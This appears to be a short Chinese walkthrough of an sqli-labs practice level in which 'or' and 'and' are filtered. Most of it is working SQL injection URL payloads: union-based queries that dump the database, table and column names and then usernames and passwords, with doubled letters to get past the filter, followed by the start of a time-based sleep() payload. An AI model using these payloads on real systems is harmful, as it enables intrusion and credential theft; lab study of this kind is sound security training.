1.那么盲注是怎么过滤or和and,直接在前面加or和and
不同于Less(25)的是,sql语句中对于id,没有"的包含,同时没有输出错误项,报错注入不能用。
2.联合注入
(1)爆库:?id=-1%20union%20select%201,2,database()--+
(2)爆表:?id=-1%20union%20select%201,2,group_concat(table_name)%20from%20infoorrmation_schema.tables%20where%20table_schema="security"--+
(3)爆列名:?id=-1' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name="users" --+
(4)爆值:?id=-1 union select 1,2,group_concat(username,'~',passwoorrd)from security.users --+
3.时间延迟
(1)数据库长度:?id=-1%20||%20if(length(database())=8,1,sleep(5))#